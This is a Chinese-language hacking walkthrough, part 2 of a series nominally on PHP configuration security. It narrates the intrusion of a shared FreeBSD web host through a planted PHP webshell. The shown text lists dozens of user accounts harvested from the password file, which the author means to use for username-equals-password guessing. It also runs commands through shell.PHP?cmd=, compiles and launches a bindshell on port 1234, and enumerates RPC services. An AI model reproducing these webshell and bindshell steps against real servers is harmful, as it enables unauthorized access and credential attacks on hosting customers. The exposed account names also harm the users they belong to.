构建Linux下的安全 PHP配置漏洞攻击(2)

　　model:*:106227:51:USER:/home/model:/local/bin/null

　　leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null

　　fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null

　　ljok:*:106230:51:USER:/home/ljok:/local/bin/null

　　baorui:*:106231:51:USER:/home/baorui:/local/bin/null

　　fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null

　　zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null

　　xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null

　　zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null

　　power:*:106236:51:USER:/home/power:/local/bin/null

　　feefan:*:106237:51:USER:/home/feefan:/local/bin/null

　　paradise:*:106238:51:USER:/home/paradise:/local/bin/null

　　wulc:*:106239:51:USER:/home/wulc:/local/bin/null

　　jcm:*:106240:51:USER:/home/jcm:/local/bin/null

　　liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null

　　jingder:*:106242:51:USER:/home/jingder:/local/bin/null

　　hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null

　　adai:*:106244:51:USER:/home/adai:/local/bin/null

　　fightben:*:106245:51:USER:/home/fightben:/local/bin/null

　　lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null

　　xeno:*:106247:51:USER:/home/xeno:/local/bin/null

　　……（太多了~省略）

　　只有几个用户有shell可以登陆，cp到我的目录下面，等一下分离出usrename看看有没有人username=passwd的~呵呵~

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=set

　　HOME=/

　　PS1=$

　　OPTIND=1

　　PS2=>

　　PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin

　　IFS=

　　好差的"环境",被设置成这样…

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=cat /etc/hosts

　　# $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $

　　#

　　# Host Database

　　# This file should contain the addresses and aliases

　　# for local hosts that share this file.

　　# In the presence of the domain name service or NIS, this file may

　　# not be consulted at all; see /etc/host.conf for the resolution

　　order.

　　#

　　#

　　127.0.0.1 localhost localhost.my.domain myname.my.domain

　　#

　　# Imaginary network.

　　#10.0.0.2 myname.my.domain myname

　　#10.0.0.3 myfriend.my.domain myfriend

　　#

　　# According to RFC 1918, you can use the following IP networks for

　　# private nets which will never be connected to the Internet:

　　#

　　# 10.0.0.0 - 10.255.255.255

　　# 172.16.0.0 - 172.31.255.255

　　# 192.168.0.0 - 192.168.255.255

　　#

　　#

　　不算太小啊~hosts ~

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=whereis -b gcc

　　（老天保佑~有gcc）

　　gcc:/usr/sbin/gcc（万岁！！！！！！！！！！！！）

　　我来试试看~弄一个大家伙上去，编译一下，哈哈~速度好快！

　　webshell太累了，bind一个shell出来方便一点…（上传binshell程序，自己写也可以用perl/C,都不太难）

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=gcc -o bind bindshell.c

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=./bind 1234

　　bind shell too port 1234

　　telnet xxx.51.net 1234

　　……下面省略，反正就可以执行命令了

　　嗯~好像这台没装MySQL,可惜~呵呵~~~~~~~~~,对了oso.com.cn的好像有~,不过最近停了……

　　lynx http://xxx.51.net/cgi-bin/shell.PHP?cmd=/usr/sbin/rpcinfo -p

　　localhost

　　portmapper 100000 portmap sunrpc

　　rstatd 100001 rstat rstat_svc rup perfmeter

　　rusersd 100002 rusers

　　nfs 100003 nfsprog

　　ypserv 100004 ypprog

　　mountd 100005 mount showmount

　　ypbind 100007

　　walld 100008 rwall shutdown

　　yppasswdd 100009 yppasswd

　　etherstatd 100010 etherstat

　　rquotad 100011 rquotaprog quota rquota

　　sprayd 100012 spray

(责任编辑：admin)